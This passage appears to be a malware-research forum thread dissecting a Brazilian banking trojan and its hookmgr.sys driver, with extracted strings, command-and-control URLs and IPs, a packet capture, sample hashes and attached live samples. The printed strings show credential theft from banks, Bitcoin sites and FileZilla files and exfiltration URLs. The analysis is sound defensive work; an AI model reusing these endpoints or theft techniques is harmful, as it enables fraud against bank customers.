  var0x01{Irp->IoStatus.Status}
  IofCompleteRequest(Irp, 0);
  return 0;
}
This will need a better windows sysinternals than myself :roll: and I don't want to speculate.
Please kindly help w/thanks. I have to go back to ELF/nix malware asap.
Attached are samples.
Attachments
7z/infected
(6.8 MiB) Downloaded 100 times
Last edited by unixfreaxjp on Sun Jan 31, 2016 9:43 am, edited 2 times in total.

Re: Win32/Brazil Drivers? I don't know this..

 #27792  by EP_X0FF
 Sun Jan 31, 2016 9:07 am
This switch is part of dispatch routine for controls codes sent from user mode via DeviceIoControl. There three commands which are for copy memory and return pointers to PsGetCurrentThreadId and PsGetCurrentThreadProcessId to the user mode caller.

Re: Win32/Brazil Drivers? I don't know this..

 #27793  by unixfreaxjp
 Sun Jan 31, 2016 9:27 am
EP_X0FF wrote:This switch is part of dispatch routine for controls codes sent from user mode via DeviceIoControl. There three commands which are for copy memory and return pointers to PsGetCurrentThreadId and PsGetCurrentThreadProcessId to the user mode caller.
:) Thank you very much, this explains a lot of explanation for the nature of this threat.

Re: Win32/Brazil Drivers? I don't know this..

 #27822  by unixfreaxjp
 Fri Feb 05, 2016 8:35 am
Same stealer crook, using this bin w/ the same driver's drop:
Image
Code: Select all
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\hookmgr
This time they stopped using .NET and switched to DelPhi compiled PE but used the same stuff https://twitter.com/MalwareMustDie/stat ... 3540974592
Image
AutoIt3 pdb....
Code: Select all
\PROGRAM FILES\AUTOIT3\AUTOITX\EXAMPLES\C++\AUTOITX.SLN
CNC is pointing to the abused AWS, their M.O.
Other similar behavior:
Code: Select all
1. Big sizing to avade size limit scanning
2. Starting many more child process, exceeding limit
3. Seeking Windows Mail...likely, same as before
4. that hookmrg.sys stuff
5. aiming several process for injection
Distributed from a .vbe malvertisement with decoded src like this
Code: Select all
CNC {
     "Method" : "GET /fazendo/fix.php HTTP/1.1"
     "Host" : "54.207.104.36"
     "ip": "54.207.104.36",
     "hostname": "ec2-54-207-104-36.sa-east-1.compute.amazonaws.com",
     "city": "Sao Paulo",
     "region": "Sao Paulo",
     "country": "BR",
     "loc": "-23.5475,-46.6361",
     "org": "AS16509 Amazon.com, Inc."
     "prefix": "54.207.0.0/17 AMAZON-02, US"
     "traffic" :
2016-02-05 16:05:29.480173 IP MMD-CHECK > ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http: Flags [S], seq 547742150, win 8192, options [mss 14
60,nop,wscale 8,nop,nop,sackOK], length 0
2016-02-05 16:05:29.480209 IP ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http > MMD-CHECK: Flags [S.], seq 3627243628, ack 547742151, win 2920
0, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2016-02-05 16:05:29.480296 IP MMD-CHECK > ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http: Flags [.], ack 1, win 256, length 0
2016-02-05 16:05:29.480665 IP MMD-CHECK > ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http: Flags [P.], seq 1:320, ack 1, win 256, length 319
        0x0000:  0a00 2700 0000 0602 2710 4c03 0800 4500  ..'.....'.L...E.
        0x0010:  0167 7c29 4000 8006 1cc1 c0a8 010b 36cf  .g|)@.........6.
        0x0020:  6824 c016 0050 20a5 e1c7 d833 586d 5018  h$...P.....3XmP.
        0x0030:  0100 761c 0000 4745 5420 2f66 617a 656e  ..v...GET./fazen
        0x0040:  646f 2f66 6978 2e70 6870 2048 5454 502f  do/fix.php.HTTP/
        0x0050:  312e 310d 0a43 6f6e 7465 6e74 2d54 7970  1.1..Content-Typ
        0x0060:  653a 2061 7070 6c69 6361 7469 6f6e 2f78  e:.application/x
        0x0070:  2d77 7777 2d66 6f72 6d2d 7572 6c65 6e63  -www-form-urlenc
        0x0080:  6f64 6564 0d0a 4361 6368 652d 636f 6e74  oded..Cache-cont
        0x0090:  726f 6c3a 206e 6f2d 6361 6368 650d 0a50  rol:.no-cache..P
        0x00a0:  7261 676d 613a 206e 6f2d 6361 6368 650d  ragma:.no-cache.
        0x00b0:  0a48 6f73 743a 2035 342e 3230 372e 3130  .Host:.54.207.10
        0x00c0:  342e 3336 0d0a 4163 6365 7074 3a20 7465  4.36..Accept:.te
Interesting:
Code: Select all
==TaaT==Taa
Sample:
PE https://www.virustotal.com/en/file/0bb0 ... /analysis/
SYS https://www.virustotal.com/en/file/e547 ... /analysis/
Attachments
7z/infected
(5.25 MiB) Downloaded 91 times

Re: Win32/Brazil Drivers? I don't know this..

 #27837  by iShare2
 Mon Feb 08, 2016 10:28 pm
The .net file you mentioned earlier, is just a wrapper (shell) for the actual malware.
The unpacked file would be EE0405369DE26A3E86CC3A754F4155F7 (See the Attachment) which is compiled by Delphi.

If you look into the Delphi binary resources, you could extract following payloads from RCData section:

LIB64
Internal Name: tokip.exe
f0d67163a9dc5d6ba02b0932d9a20a82

LIBH32
32Bit variant of dropped hookmgr.sys driver
Config String: c:\users\admin\appdata\roaming\x86\objchk_win7_x86\i386\hookmgr.pdb
a33adeec70904f792dfcf8492358fe6e

LIBH64
64Bit variant of dropped hookmgr.sys driver
Config String: c:\users\admin\appdata\roaming\x64\objchk_wlh_amd64\amd64\hookmgr.pdb
01dd9fac90d6e279df1bd5d26ea18239

This malware is a variant of well-known Brazilian banking Trojan known as Banbra targeting almost 60 different entities.
Attachments
(5.35 MiB) Downloaded 122 times

Re: WinNT/Banbra (Brazilian banker)

 #27896  by benkow_
 Thu Feb 18, 2016 9:05 am
I don't know if it's the same family but another Brasilian banker trojan:
288781db1e7741fda33897a42457510a - https://www.virustotal.com/en/file/b2db ... 455784542/
https://malwr.com/analysis/YTMwMTIxMzEy ... hjZWZjZWI/

Some unpacked strings:
Code: Select all
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
http://shhoptime.com.br/js/up.txt
rundll32.exe
http://shhoptime.com.br/js/get
http://shhoptime.com.br/js/postUP.php?o=
http://shhoptime.com.br/js/postUP.php?o=ERROR
remotejs.ddns.net
\Software\Microsoft\Windows\CurrentVersion\Run
rundll32.exe
whitehouse
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
http://testessss.agropecuaria.ws/count/getftp.php?ftp1=
http://shhoptime.com.br/js/getftp.php?ftp1=
&ftp2=
&ftp3=
&ftp4=
&ftp5=
Email/Loguin: 
Senha: 
Token 2
 passo:
Assinatura Eletronica: 
SELECT * FROM AntiVirusProduct
Celular Token: 
Senha Certificado: 
AntiVirusProduct
AntiSpywareProduct
FirewallProduct
SecurityCenter
SecurityCenter2
PIN de seguran
a:
Banco Bradesco | Pessoa F
sica, Exclusive, Prime e Private
blockdesco
Bradesco PF
Banco Bradesco [Seguran
Banco Bradesco | Pessoa F
sica, Exclusive, Prime e Private - Google Chrome
Banco Bradesco | Pessoa F
sica, Exclusive, Prime e Private - Mozilla Firefox
Banco Bradesco | Pessoa Jur
dica
Bradesco PJ
Banco Bradesco | Pessoa Jur
dica - Google Chrome
Banco Bradesco | Pessoa Jur
dica - Mozilla Firefox
Bradesco Prime
Bradesco Prime - Google Chrome
Bradesco Prime - Mozilla Firefox
Mercado Bitcoin - Participe da tecnologia mais inovadora do mundo
blockbtc
Mercado BitCoin
Mercado Bitcoin [Seguran
Mercado Bitcoin - Participe da tecnologia mais inovadora do mundo - Google Chrome
Mercado Bitcoin - Participe da tecnologia mais inovadora do mundo - Mozilla Firefox
Carteira Bitcoin - Seja o Seu Pr
prio Banco - Blockchain.info
BlockChain
Blockchain [Seguran
Carteira Bitcoin - Seja o Seu Pr
prio Banco - Blockchain.info - Google Chrome
Carteira Bitcoin - Seja o Seu Pr
prio Banco - Blockchain.info - Mozilla Firefox
My Wallet - Be Your Own Bank - Blockchain.info
My Wallet - Be Your Own Bank - Blockchain.info - Google Chrome
My Wallet - Be Your Own Bank - Blockchain.info - Mozilla Firefox
<|SocketMain|>
<<|
<|OK|>
<|Info|>
<|>
1.5
<|PING|>
<|PONG|>
<|REQUESTKEYBOARD|>
<|REQUESTNAVEGADOR|>
<|REQUESTDESKTOP|>
<|first|>
reicxao
blockbb
blockita
blockcef
blockdesco
blockhs
blocksanta
blockbtc
blockchain
unblockbb
unblockita
unblockcef
unblockdesco
unblockhs
unblocksanta
unblockbtc
unblockchain
pedinfo
<|Close|>
<|MousePos|>
<|MouseLD|>
<|MouseLU|>
<|MouseRD|>
<|MouseRU|>
STARTFAKE
CEF
HSBC
ITAU
DESCO
SANTA
BIT
BLOCKCHAIN
santatab
smstoken
santaass
santapjtoken
asscef
itafs6
itafnasc
itatabela
itaToken
itaSMSTok
hsbccpf
TecladoHsbc
SeloHsbc
caracteres
senhaletra
Finalizahsbc
FimHsbc
descotab
descoToken
descoTokenCel
descscerti
s6bb
s86bb
scertibb
scontagf
s4bb
final
<|okok|>
<|gets|>
<|TAMANHO|>
<|Desktop|>
<|KEYBOARD|>
BACKSPACE
BKSP
BREAK
CAPSLOCK
CLEAR
DEL
DELETE
DOWN
END
ENTER
ESC
ESCAPE
F10
F11
F12
F13
F14
F15
F16
HELP
HOME
INS
LEFT
NUMLOCK
PGDN
PGUP
PRTSC
RIGHT
SCROLLLOCK
{DOWN}
{UP}
{LEFT}
{RIGHT}
{DEL}
{BS}
{TAB}
{ENTER}
.bat
Erase "%s"
If exist "%s" Goto 1
Open
blockbb
blockcef
Caixa
blockita
Itau
blocksanta
Santander
blockdesco
Bradesco
blockhs
HSBC
blockbtc
Mercado Bitcoin
blockchain
Blockchain
Sem Bloqueio
ZYYd
Q,h
ZYYd
\FileZilla\sitemanager.xml
<Host>
</Host>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Port>
</Port>
Host: 
 Port: 
 User: 
 Pass: 
\FileZilla\recentservers.xml
Host:_
_Port:_
_User:_
_Pass_
NOT FOUND
SeShutdownPrivilege
C&C
Code: Select all
http://shhoptime.com.br/js/post.php?u=
http://shhoptime.com.br/js/up.txt -> Version
Image
77bots today
Attachments
infected
(2.29 MiB) Downloaded 115 times

Re: WinNT/Banbra (Brazilian banker)

 #27919  by unixfreaxjp
 Tue Feb 23, 2016 5:27 am
benkow_ wrote:I don't know if it's the same family but another Brasilian banker trojan
If it uses "hookmgr.sys" then it is the same actor/threat/variant. That driver is interesting api to grab memory as per explained in this report: http://www.kernelmode.info/forum/viewto ... 217#p27792
The bad guy will wrap its payload into anything. This report is correctly explain the situation http://www.kernelmode.info/forum/viewto ... 217#p27837
and can be used for the further reference. Bankers for sure, not a cheap code..

Re: WinNT/Banbra (Brazilian banker)

 #27948  by iShare2
 Thu Feb 25, 2016 7:33 pm
Benkow

After removing initial VB6 wrapper and secondary UPX layer, the unpacked malware would be 524B3CDF55A52A4FCE10040CEA36A848 (See the attachment)
The malware which is also coded in Delphi, matches signatures of Banload aka Delf, yet another Brazilian banker.
All the C2 info and main strings are stored in plain text.
Attachments
(2.06 MiB) Downloaded 88 times

Re: WinNT/Banbra (Brazilian banker)

 #29262  by markusg
 Fri Sep 23, 2016 4:49 pm
SHA256:
c4dcbc877b4a21dd81ff3f3b559f64f11e8555246edad4a58d43891108e5306b
Dateiname:
Aviões do Forró - Vou Deixar Ele Ir - [Baixar CD] Aviões Do Forr...
https://virustotal.com/de/file/c4dcbc87 ... 474647274/
Attachments
(2.01 MiB) Downloaded 55 times
 Return to “Malware”